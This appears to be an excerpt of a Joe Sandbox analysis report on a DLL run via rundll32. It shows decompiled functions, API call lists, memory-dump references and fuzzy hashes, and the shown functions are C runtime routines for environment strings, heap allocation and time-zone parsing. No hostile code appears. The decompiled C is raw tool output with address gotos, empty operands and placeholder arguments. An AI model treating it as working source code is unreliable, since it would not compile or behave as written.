                Function 00007FFA535EEE4C Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEE65
                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEEC7
                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEF01
                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEF2B
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                • String ID:
                • API String ID: 1557788787-0
                • Opcode ID: 57fcc6d14fadeefd58268156dcdd6c0be34df16fb2c93034868b229699ff29a0
                • Instruction ID: c642c8e6f55a933ada6c5ae1589ddf869c047f612db210b5182ab2b7cf1b367b
                • Opcode Fuzzy Hash: 57fcc6d14fadeefd58268156dcdd6c0be34df16fb2c93034868b229699ff29a0
                • Instruction Fuzzy Hash: C3216421E39B9585E6209F11644002AB6A9FF89BD0B4CA174DE9E73BD8DF3CE4519740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E7350 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 57%
                			E00007FFA7FFA535E7350(void* __ecx, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t27;
				void* _t28;
				void* _t30;
				intOrPtr _t35;
				void* _t41;
				intOrPtr* _t61;
				intOrPtr* _t62;
				long long _t68;
				void* _t70;
				long long _t84;
				signed int _t85;
				void* _t86;
				intOrPtr* _t87;
				void* _t90;

				_t70 = __rcx;
				_a8 = __rbx;
				_t2 = _t70 - 1; // -1
				r14d = __ecx;
				if (_t2 - 1 <= 0) goto 0x535e7384;
				_t27 = E00007FFA7FFA535E8380(_t61);
				 *_t61 = 0x16;
				_t28 = E00007FFA7FFA535E8260(_t27);
				goto 0x535e74b3;
				E00007FFA7FFA535EEA94(_t28, _t41, _t61, _t86);
				r8d = 0x104;
				GetModuleFileNameA(??, ??, ??);
				_t87 =  *0x53755730; // 0x21991b53370
				 *0x53755740 = 0x53754cf0;
				if (_t87 == 0) goto 0x535e73bb;
				if ( *_t87 != dil) goto 0x535e73be;
				_t62 =  &_a32;
				_a24 = _t85;
				_v56 = _t62;
				r8d = 0;
				_a32 = _t85;
				_t30 = E00007FFA7FFA535E7130(0, 0x53754cf0, 0x53754cf0, 0x53754cf0, _t85, 0x53754cf0, _t90, __r8,  &_a24);
				r8d = 1;
				E00007FFA7FFA535E72EC(_t30, _a24, _a32, __r8);
				_t68 = _t62;
				if (_t62 != 0) goto 0x535e740f;
				E00007FFA7FFA535E8380(_t62);
				_t10 = _t68 + 0xc; // 0xc
				 *_t62 = _t10;
				goto 0x535e74ae;
				_v56 =  &_a32;
				E00007FFA7FFA535E7130(0, _t68, 0x53754cf0, _t68, _t85, 0x53754cf0, _t90, _t62 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x535e7445;
				_t35 = _a24 - 1;
				 *0x53755720 = _t68;
				 *0x5375571c = _t35;
				goto 0x535e7408;
				_a16 = _t85;
				0x535ee390();
				if (_t35 == 0) goto 0x535e7474;
				E00007FFA7FFA535E7E58( &_a32, _a16);
				_a16 = _t85;
				E00007FFA7FFA535E7E58( &_a32, _t68);
				goto 0x535e74b3;
				_t84 = _a16;
				if ( *_t84 == _t85) goto 0x535e748f;
				if ( *((intOrPtr*)(_t84 + 8)) != _t85) goto 0x535e7483;
				 *0x5375571c = 0;
				_a16 = _t85;
				 *0x53755720 = _t84;
				E00007FFA7FFA535E7E58(_t84 + 8, _t85 + 1);
				_a16 = _t85;
				E00007FFA7FFA535E7E58(_t84 + 8, _t68);
				return _t35;
			}





















                0x7ffa535e7350
                0x7ffa535e7350
                0x7ffa535e7363
                0x7ffa535e7366
                0x7ffa535e736c
                0x7ffa535e736e
                0x7ffa535e7378
                0x7ffa535e737a
                0x7ffa535e737f
                0x7ffa535e7384
                0x7ffa535e7390
                0x7ffa535e739b
                0x7ffa535e73a1
                0x7ffa535e73aa
                0x7ffa535e73b4
                0x7ffa535e73b9
                0x7ffa535e73be
                0x7ffa535e73c2
                0x7ffa535e73ca
                0x7ffa535e73cf
                0x7ffa535e73d2
                0x7ffa535e73db
                0x7ffa535e73e4
                0x7ffa535e73f1
                0x7ffa535e73f6
                0x7ffa535e73fc
                0x7ffa535e73fe
                0x7ffa535e7403
                0x7ffa535e7406
                0x7ffa535e740a
                0x7ffa535e7421
                0x7ffa535e7426
                0x7ffa535e742f
                0x7ffa535e7434
                0x7ffa535e7436
                0x7ffa535e743d
                0x7ffa535e7443
                0x7ffa535e7449
                0x7ffa535e7450
                0x7ffa535e7459
                0x7ffa535e745f
                0x7ffa535e7467
                0x7ffa535e746b
                0x7ffa535e7472
                0x7ffa535e7474
                0x7ffa535e7481
                0x7ffa535e748d
                0x7ffa535e748f
                0x7ffa535e7497
                0x7ffa535e749b
                0x7ffa535e74a2
                0x7ffa535e74aa
                0x7ffa535e74ae
                0x7ffa535e74c5

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: FileModuleName_invalid_parameter_noinfo
                • String ID: C:\Windows\SYSTEM32\rundll32.exe
                • API String ID: 3307058713-2484965969
                • Opcode ID: 0b6cb0882f23a2b5e3a001a1a1574599cc91a4ef05d18a512e42ec2301af3a4b
                • Instruction ID: 7db2ba504eb390c77247faff789e8d262208319ca8554e8c7cd5565de7da5005
                • Opcode Fuzzy Hash: 0b6cb0882f23a2b5e3a001a1a1574599cc91a4ef05d18a512e42ec2301af3a4b
                • Instruction Fuzzy Hash: FD41A132A28F528AEB15DF31A4400BC6BAAEF86BD0B4C9075ED4EA7745DF3DE4419340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E33BC Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 65%
                			E00007FFA7FFA535E33BC(void* __ebx, void* __rcx) {
				void* __rbx;
				void* _t11;
				void* _t13;
				void* _t18;
				void* _t19;
				void* _t21;

				_t2 =  ==  ? 1 :  *0x53754b08 & 0x000000ff;
				 *0x53754b08 =  ==  ? 1 :  *0x53754b08 & 0x000000ff;
				E00007FFA7FFA535E3914( ==  ? 1 :  *0x53754b08 & 0x000000ff, 1, _t11, _t13, _t19, _t21);
				if (E00007FFA7FFA535E42EC() != 0) goto 0x535e33eb;
				goto 0x535e33ff; // executed
				E00007FFA7FFA535E7DD4(_t18); // executed
				if (0 != 0) goto 0x535e33fd;
				E00007FFA7FFA535E4348(0);
				goto 0x535e33e7;
				return 1;
			}









                0x7ffa535e33d0
                0x7ffa535e33d3
                0x7ffa535e33d9
                0x7ffa535e33e5
                0x7ffa535e33e9
                0x7ffa535e33eb
                0x7ffa535e33f2
                0x7ffa535e33f6
                0x7ffa535e33fb
                0x7ffa535e3404

                APIs
                • __isa_available_init.LIBCMT ref: 00007FFA535E33D9
                • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFA535E33DE
                  • Part of subcall function 00007FFA535E42EC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFA535E42F0
                  • Part of subcall function 00007FFA535E42EC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFA535E42F5
                  • Part of subcall function 00007FFA535E42EC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFA535E42FA
                • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFA535E33F6
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                • String ID:
                • API String ID: 3388242289-0
                • Opcode ID: 9f98b25316a4bfb7b7888dd646c33a76e946e665d901a34c7cd22b4946b12760
                • Instruction ID: a76ceec288fbaf6dc7bb4001ceb0d604b93e307e3b988afb1047b141132d1c70
                • Opcode Fuzzy Hash: 9f98b25316a4bfb7b7888dd646c33a76e946e665d901a34c7cd22b4946b12760
                • Instruction Fuzzy Hash: 86E01250D3DB424DFE5927E11082AB8275A0F9B301F4DE0F5D95D72183CD0D6599B521
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EFE8C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 58%
                			E00007FFA7FFA535EFE8C(void* __eax, signed int __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, long long _a8, long long _a16, long long _a24) {
				long long _v24;
				void* _t19;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				void* _t29;
				long long _t39;
				signed long long _t45;

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if ((0 | _t29 - 0x00002000 > 0x00000000) != 0) goto 0x535efec9;
				_t19 = E00007FFA7FFA535E8380(_t39);
				 *_t39 = 9;
				E00007FFA7FFA535E8260(_t19);
				goto 0x535eff2d;
				E00007FFA7FFA535ED6A8();
				_t45 = __rbx;
				_v24 = __rbx;
				_t22 =  *0x53755250; // 0x40
				if (_t29 - _t22 < 0) goto 0x535eff21;
				if ( *((intOrPtr*)(0x53754e50 + __rbx * 8)) == __rbx) goto 0x535efef5;
				goto 0x535eff17; // executed
				E00007FFA7FFA535EFDA4(_t39, __rbx, __rsi, __rbp); // executed
				 *((long long*)(0x53754e50 + _t45 * 8)) = _t39;
				if (_t39 != 0) goto 0x535eff08;
				goto 0x535eff21;
				_t24 =  *0x53755250; // 0x40
				_t25 = _t24 + 0x40;
				 *0x53755250 = _t25;
				_v24 = _t45 + 1;
				goto 0x535efee2;
				E00007FFA7FFA535ED6FC();
				goto 0x535efec5;
				return _t25;
			}











                0x7ffa535efe8c
                0x7ffa535efe91
                0x7ffa535efe96
                0x7ffa535efeb2
                0x7ffa535efeb4
                0x7ffa535efebe
                0x7ffa535efec0
                0x7ffa535efec7
                0x7ffa535efece
                0x7ffa535efed4
                0x7ffa535efed7
                0x7ffa535efedc
                0x7ffa535efee4
                0x7ffa535efef1
                0x7ffa535efef3
                0x7ffa535efef5
                0x7ffa535efefa
                0x7ffa535eff01
                0x7ffa535eff06
                0x7ffa535eff08
                0x7ffa535eff0e
                0x7ffa535eff11
                0x7ffa535eff1a
                0x7ffa535eff1f
                0x7ffa535eff26
                0x7ffa535eff2b
                0x7ffa535eff42

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: f182c36d18bb0558c4e136d7a85a6dd1f9f42aaf76e98a9eed0fe9a62827462d
                • Instruction ID: bf7679defbbe6ecab329ff359acfa1e7b28f8dd3f48751efd3df88309eeae16a
                • Opcode Fuzzy Hash: f182c36d18bb0558c4e136d7a85a6dd1f9f42aaf76e98a9eed0fe9a62827462d
                • Instruction Fuzzy Hash: ED114C22D2DF828AF6109F50A44057963AAFFC2780F5EA075F69D67796DF2CF800A750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E7FB0 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 44%
                			E00007FFA7FFA535E7FB0(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x535e7fcf;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x535e8012;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x535e7ff6;
				if (E00007FFA7FFA535EF900(1) == 0) goto 0x535e8012;
				if (E00007FFA7FFA535EF4E8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x535e8012;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x535e7fe1;
				goto 0x535e801f;
				E00007FFA7FFA535E8380(_t22);
				 *_t22 = 0xc;
				return 0;
			}






                0x7ffa535e7fb0
                0x7ffa535e7fbf
                0x7ffa535e7fc3
                0x7ffa535e7fc3
                0x7ffa535e7fcd
                0x7ffa535e7fdb
                0x7ffa535e7fdf
                0x7ffa535e7fe8
                0x7ffa535e7ff4
                0x7ffa535e8005
                0x7ffa535e800e
                0x7ffa535e8010
                0x7ffa535e8012
                0x7ffa535e8017
                0x7ffa535e8024

                APIs
                • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFA535E8B04,?,?,00009BD95A2971B4,00007FFA535E8389,?,?,?,?,00007FFA535E7E7D,?,?,?), ref: 00007FFA535E8005
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 95bd6b468405d17fa2efb7e683ed559ac8666e7fb7fc56f28944b4f6525edaca
                • Instruction ID: a9e670807884ebb764c2cba4b8859986aa21cdf9515bc769ee08227e5fc957a5
                • Opcode Fuzzy Hash: 95bd6b468405d17fa2efb7e683ed559ac8666e7fb7fc56f28944b4f6525edaca
                • Instruction Fuzzy Hash: 1AF06D41B2AB0689FE59976258103B9529B5FCAB60F0CF4B0C91EA62D1DE2CE480B220
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E7E98 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 44%
                			E00007FFA7FFA535E7E98(void* __rcx) {
				void* __rbx;
				intOrPtr* _t14;

				if (__rcx - 0xffffffe0 > 0) goto 0x535e7ee3;
				_t16 =  ==  ? _t14 : __rcx;
				goto 0x535e7eca;
				if (E00007FFA7FFA535EF900(1) == 0) goto 0x535e7ee3;
				if (E00007FFA7FFA535EF4E8(_t14,  ==  ? _t14 : __rcx,  ==  ? _t14 : __rcx) == 0) goto 0x535e7ee3;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t14 == 0) goto 0x535e7eb5;
				goto 0x535e7ef0;
				E00007FFA7FFA535E8380(_t14);
				 *_t14 = 0xc;
				return 0;
			}





                0x7ffa535e7ea5
                0x7ffa535e7eaf
                0x7ffa535e7eb3
                0x7ffa535e7ebc
                0x7ffa535e7ec8
                0x7ffa535e7ed6
                0x7ffa535e7edf
                0x7ffa535e7ee1
                0x7ffa535e7ee3
                0x7ffa535e7ee8
                0x7ffa535e7ef5

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 480c0af5c5187464a18a8393c16ff6192f5d8bbdf6fdb0e3d4f81ab0fce67787
                • Instruction ID: 4ede43ae513be3baac5debab2facc92d28265a310ba8b1bee03fc949d1967733
                • Opcode Fuzzy Hash: 480c0af5c5187464a18a8393c16ff6192f5d8bbdf6fdb0e3d4f81ab0fce67787
                • Instruction Fuzzy Hash: 94F01211F3DB4649FE6497715901279519B9FC6760F0CEAB4DD2EE52C1DE6CA840A120
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00007FFA535EB2BC Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMONCrypto
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 302 7ffa535eb2bc-7ffa535eb2f0 call 7ffa535eaa38 call 7ffa535eaaa0 307 7ffa535eb2f6-7ffa535eb301 call 7ffa535eaa40 302->307 308 7ffa535eb4f5-7ffa535eb536 call 7ffa535e8280 call 7ffa535eaa38 call 7ffa535eaaa0 302->308 313 7ffa535eb307-7ffa535eb311 307->313 314 7ffa535eb4e0-7ffa535eb4f4 call 7ffa535e8280 307->314 332 7ffa535eb53c-7ffa535eb547 call 7ffa535eaa40 308->332 333 7ffa535eb6cb-7ffa535eb739 call 7ffa535e8280 call 7ffa535f1990 308->333 316 7ffa535eb339-7ffa535eb342 call 7ffa535e7e58 313->316 317 7ffa535eb313-7ffa535eb319 313->317 314->308 329 7ffa535eb345-7ffa535eb34c 316->329 320 7ffa535eb31c-7ffa535eb327 317->320 324 7ffa535eb329-7ffa535eb32f 320->324 325 7ffa535eb331-7ffa535eb333 320->325 324->320 324->325 325->316 328 7ffa535eb490-7ffa535eb4a0 325->328 329->329 331 7ffa535eb34e-7ffa535eb36e call 7ffa535e7e98 call 7ffa535e7e58 329->331 331->328 351 7ffa535eb374-7ffa535eb37b 331->351 340 7ffa535eb6b6-7ffa535eb6ca call 7ffa535e8280 332->340 341 7ffa535eb54d-7ffa535eb558 call 7ffa535eaa70 332->341 354 7ffa535eb742-7ffa535eb745 333->354 355 7ffa535eb73b-7ffa535eb740 333->355 340->333 352 7ffa535eb6a1-7ffa535eb6b5 call 7ffa535e8280 341->352 353 7ffa535eb55e-7ffa535eb581 call 7ffa535e7e58 GetTimeZoneInformation 341->353 351->351 356 7ffa535eb37d-7ffa535eb38b call 7ffa535e7ef8 351->356 352->340 372 7ffa535eb587-7ffa535eb5a9 353->372 373 7ffa535eb67a-7ffa535eb6a0 call 7ffa535eaa30 call 7ffa535eaa20 call 7ffa535eaa28 353->373 361 7ffa535eb747-7ffa535eb74a 354->361 362 7ffa535eb74c-7ffa535eb75c call 7ffa535e7e98 354->362 360 7ffa535eb790-7ffa535eb7a2 355->360 369 7ffa535eb391-7ffa535eb3ab call 7ffa535f1998 356->369 370 7ffa535eb4cb-7ffa535eb4df call 7ffa535e8280 356->370 365 7ffa535eb7a4-7ffa535eb7a7 360->365 366 7ffa535eb7b3 call 7ffa535eb50c 360->366 361->360 382 7ffa535eb767-7ffa535eb782 call 7ffa535f1990 362->382 383 7ffa535eb75e 362->383 365->366 371 7ffa535eb7a9-7ffa535eb7b1 call 7ffa535eb2bc 365->371 384 7ffa535eb7b8-7ffa535eb7e4 call 7ffa535e7e58 call 7ffa535f51e0 366->384 395 7ffa535eb4b6-7ffa535eb4ca call 7ffa535e8280 369->395 396 7ffa535eb3b1-7ffa535eb3b4 369->396 370->314 371->384 379 7ffa535eb5b3-7ffa535eb5ba 372->379 380 7ffa535eb5ab-7ffa535eb5b0 372->380 390 7ffa535eb5d4-7ffa535eb5d7 379->390 391 7ffa535eb5bc-7ffa535eb5c4 379->391 380->379 402 7ffa535eb789-7ffa535eb78b call 7ffa535e7e58 382->402 403 7ffa535eb784-7ffa535eb787 382->403 392 7ffa535eb760-7ffa535eb765 call 7ffa535e7e58 383->392 400 7ffa535eb5da-7ffa535eb616 call 7ffa535f04cc WideCharToMultiByte 390->400 391->390 398 7ffa535eb5c6-7ffa535eb5d2 391->398 392->361 395->370 404 7ffa535eb3b6-7ffa535eb3bd 396->404 405 7ffa535eb3bf-7ffa535eb3c9 396->405 398->400 418 7ffa535eb618-7ffa535eb61b 400->418 419 7ffa535eb626-7ffa535eb629 400->419 402->360 403->392 404->396 404->405 415 7ffa535eb3ce-7ffa535eb3dc call 7ffa535e8028 405->415 416 7ffa535eb3cb 405->416 427 7ffa535eb3df-7ffa535eb3e3 415->427 416->415 418->419 422 7ffa535eb61d-7ffa535eb624 418->422 423 7ffa535eb62c-7ffa535eb662 WideCharToMultiByte 419->423 422->423 425 7ffa535eb664-7ffa535eb667 423->425 426 7ffa535eb673-7ffa535eb677 423->426 425->426 428 7ffa535eb669-7ffa535eb671 425->428 426->373 429 7ffa535eb3e5-7ffa535eb3e9 427->429 430 7ffa535eb3eb-7ffa535eb3ee 427->430 428->373 429->430 431 7ffa535eb3f0-7ffa535eb3f3 429->431 430->427 432 7ffa535eb3f5-7ffa535eb40b call 7ffa535e8028 431->432 433 7ffa535eb441-7ffa535eb444 431->433 441 7ffa535eb414-7ffa535eb418 432->441 435 7ffa535eb446-7ffa535eb448 433->435 436 7ffa535eb44b-7ffa535eb459 433->436 435->436 437 7ffa535eb475-7ffa535eb479 436->437 438 7ffa535eb45b-7ffa535eb471 call 7ffa535f1998 436->438 442 7ffa535eb47c-7ffa535eb48e call 7ffa535eaa30 call 7ffa535eaa20 437->442 438->442 447 7ffa535eb473-7ffa535eb4b5 call 7ffa535e8280 438->447 444 7ffa535eb40d-7ffa535eb40f 441->444 445 7ffa535eb41a-7ffa535eb41d 441->445 442->328 444->445 448 7ffa535eb411 444->448 445->433 449 7ffa535eb41f-7ffa535eb432 call 7ffa535e8028 445->449 447->395 448->441 457 7ffa535eb43b-7ffa535eb43f 449->457 457->433 459 7ffa535eb434-7ffa535eb436 457->459 459->433 460 7ffa535eb438 459->460 460->457
                C-Code - Quality: 95%
                			E00007FFA7FFA535EB2BC(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr* __rax, long long __rbx, signed char* __rcx, void* __rdx, void* __r9, void* __r11, long long _a8, signed int _a16, signed int _a24) {
				void* _v351701864;
				void* __rdi;
				void* __rsi;
				void* _t26;
				intOrPtr _t36;
				signed int _t38;
				void* _t40;
				signed int _t43;
				void* _t45;
				void* _t46;
				signed int _t61;
				signed char* _t69;
				void* _t77;
				intOrPtr* _t92;
				signed char* _t94;
				signed int* _t95;
				intOrPtr* _t97;
				char* _t98;
				intOrPtr* _t99;
				char* _t100;
				void* _t101;
				char* _t102;
				void* _t103;
				intOrPtr* _t104;
				signed char* _t109;
				signed char* _t113;
				signed long long _t121;
				signed long long _t122;
				intOrPtr* _t125;
				void* _t137;
				void* _t138;

				_t137 = __r11;
				_t92 = __rax;
				_a8 = __rbx;
				_t97 = __rcx;
				E00007FFA7FFA535EAA38(_t26);
				r14d = 0;
				_a16 = r14d;
				_t125 = _t92;
				_a24 = r14d;
				if (E00007FFA7FFA535EAAA0(__ecx, _t92,  &_a16, __rdx) != 0) goto 0x535eb4f5;
				if (E00007FFA7FFA535EAA40(__ecx, _t92,  &_a24, __rdx) != 0) goto 0x535eb4e0;
				_t109 =  *0x53755278; // 0x0
				_t69 = _t109;
				if (_t69 == 0) goto 0x535eb339;
				r9d = __rcx[_t109 - __rcx] & 0x000000ff;
				if (_t69 != 0) goto 0x535eb331;
				_t94 =  &(__rcx[1]);
				if (r9d != 0) goto 0x535eb31c;
				if (( *__rcx & 0x000000ff) - r9d == 0) goto 0x535eb490;
				E00007FFA7FFA535E7E58(_t94, _t109);
				_t122 = _t121 | 0xffffffff;
				if ( *((intOrPtr*)(_t97 + _t122 + 1)) != r14b) goto 0x535eb345;
				E00007FFA7FFA535E7E98(_t122 + 2);
				 *0x53755278 = _t94;
				E00007FFA7FFA535E7E58(_t94, _t122 + 2);
				_t113 =  *0x53755278; // 0x0
				if (_t113 == 0) goto 0x535eb490;
				_t123 = _t122 + 1;
				if ( *((intOrPtr*)(_t97 + _t122 + 1)) != r14b) goto 0x535eb374;
				if (E00007FFA7FFA535E7EF8(__ebx, 0, _t94, _t97, _t113, _t122 + 2, _t97) != 0) goto 0x535eb4cb;
				_t10 =  &(_t94[3]); // 0x3
				r13d = _t10;
				r9d = r13d;
				if (E00007FFA7FFA535F1998(_t97,  *_t125, _t122 + 2, __r9) != 0) goto 0x535eb4b6;
				_t77 =  *_t97 - r14b;
				if (_t77 == 0) goto 0x535eb3bf;
				_t98 = _t97 + 1;
				if (_t77 != 0) goto 0x535eb3b1;
				dil =  *_t98 == 0x2d;
				if (dil == 0) goto 0x535eb3ce;
				_t99 = _t98 + 1;
				_a16 = E00007FFA7FFA535E8028(0, __esi, _t94, _t99, _t99, _t123 - 1, _t125, __r9, _t137) * 0xe10;
				_t36 =  *_t99;
				if (_t36 == 0x2b) goto 0x535eb3eb;
				if (_t36 - 0x30 - 9 > 0) goto 0x535eb3f0;
				_t100 = _t99 + 1;
				goto 0x535eb3df;
				if ( *_t100 != 0x3a) goto 0x535eb441;
				_t101 = _t100 + 1;
				_t38 = E00007FFA7FFA535E8028(0, __esi, _t94, _t101, _t101, _t123 - 1, _t125, __r9, _t137);
				_a16 = _a16 + _t38 * 0x3c;
				goto 0x535eb414;
				if (_t38 - 0x39 > 0) goto 0x535eb41a;
				_t102 = _t101 + 1;
				if ( *_t102 - 0x30 >= 0) goto 0x535eb40d;
				if ( *_t102 != 0x3a) goto 0x535eb441;
				_t103 = _t102 + 1;
				_t40 = E00007FFA7FFA535E8028(_t38 * 0x3c, __esi, _t94, _t103, _t103, _t123 - 1, _t125, __r9, _t137);
				_t61 = _a16 + _t40;
				_a16 = _t61;
				goto 0x535eb43b;
				if (_t40 - 0x39 > 0) goto 0x535eb441;
				_t104 = _t103 + 1;
				if ( *_t104 - 0x30 >= 0) goto 0x535eb434;
				if (dil == 0) goto 0x535eb44b;
				_a16 =  ~_t61;
